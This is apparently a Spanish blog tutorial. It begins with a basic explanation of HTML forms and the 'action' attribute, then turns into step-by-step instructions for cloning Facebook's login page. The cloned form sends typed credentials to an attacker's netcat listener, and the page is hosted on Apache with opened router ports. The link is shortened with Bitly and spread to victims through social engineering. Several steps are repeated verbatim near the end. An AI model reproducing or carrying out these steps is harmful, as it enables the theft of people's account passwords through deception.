Definición:
Los formularios html nos ayudan a aumentar la interactividad de nuestra Web y nos permiten recibir información de los usuarios de nuestro site. Los formularios html están compuestos por campos de texto y botones.
Una vez el usuario ha rellenado el formulario e introducido los valores en los campos, éstos son enviados para poder procesarlos. El envío de estos datos puede hacerse a un correo electrónico o a un programa que procese toda la información y nos ayude a hacer un seguimiento.
Los formularios son un tag más de html y, como todos los tags, debe ir indicado mediante una etiqueta. La etiqueta de los formularios es <form> y su cierre </form>. Todo lo que vaya dentro de estas etiquetas, serán partes del formulario.
La etiqueta <form> tiene una serie de atributos básicos que vamos a pasarte a explicar a continuación.
action
El atributo “action” indica el tipo de acción que va a realizar el formulario. Anteriormente indicamos que la información podía enviarse a un correo electrónico o a un programa que la gestione. Es mediante esta etiqueta que se gestionan los formularios.
Si queremos que el formulario se envíe a un correo, la acción quedaría escrita de la siguiente manera: <form action=mailto:direcciondelcorreo@correo.com…></form>. Este tipo de envíos se utilizarían para casos de formularios de contacto, de sugerencias, etc.
Si lo que queremos es que la información sea enviada a un programa que la gestione, debemos indicarle en la acción, la url del archivo donde se encuentra ubicado el programa que la gestionará. Lo escribiríamos de la siguiente manera: <form action="dirección completa del archivo que la gestionará" ...> </form>. Este tipo de envíos se utilizarían para casos de formularios de encuestas, cuestionarios, etc.
Tutorial:
1º- Entramos en facebook y descargamos la página de registro.
2º- Una vez descargada la abrimos con nuestro editor de texto y buscamos:
login_form
*Que es el identificador del formulario.
Ahora cambiaremos el atributo action por la IP de nuestro Netcat. Sería algo así:
action="http://192.168.1.131:8080/mrrobot.htm"
Donde la IP sea la de nuestro pc atacante el puerto que configuremos en netcat y nuestro usuario.
action="[IP]:[PUERTO NETCAT]/[USUARIO].htm"
3º- Ahora vamos a poner a la escucha nuestro netcat, para ello:
netcat -lvp 8080
4º- Por último usaremos técnicas de ingeniería social para infectar a una posible víctima, podemos encender un servidor apache y pasarle el link...
Vídeo:
Hacer en WAN:
- Abrir puertos 80 (Para Apache) y 8080 (Para Netcat) del router.
- ¿Cómo abrir puertos? Router ZXHN H1080N V2.3
- XAMPP
- ¿Cómo instalar XAMPP? XAMPP
- ./xampp-linux.run
Tutorial:
1º- Ponemos a la escucha Netcat con:
netcat -lvp 8080
2º- Descargamos y modificamos la web de facebook como antes y la copiamos en:
/opt/lampp/htdocs/facebookmalo.html
3º- Activamos el servicio Apache.
gksu /opt/lampp/manager-linux-x64.run
4º- Ahora con los puertos abiertos en el router vamos a ver cual es nuestra IP pública:
Cuál es mi IP
5º- Cuando la sepamos la copiamos y le añadimos la ruta de nuestra web, quedaría algo así:
87.219.199.10/facebookmalo.html
6º- Pasamos ese link por un acortador de url:
Bitly
7º- Y el enlace que nos saldrá se lo pasamos a alguien mediante ingeniería social.
netcat -lvp 8080
2º- Descargamos y modificamos la web de facebook como antes y la copiamos en:
/opt/lampp/htdocs/facebookmalo.html
3º- Activamos el servicio Apache.
gksu /opt/lampp/manager-linux-x64.run
4º- Ahora con los puertos abiertos en el router vamos a ver cual es nuestra IP pública:
Cuál es mi IP
5º- Cuando la sepamos la copiamos y le añadimos la ruta de nuestra web, quedaría algo así:
87.219.199.10/facebookmalo.html
6º- Pasamos ese link por un acortador de url:
Bitly
7º- Y el enlace que nos saldrá se lo pasamos a alguien mediante ingeniería social.
0 comentarios: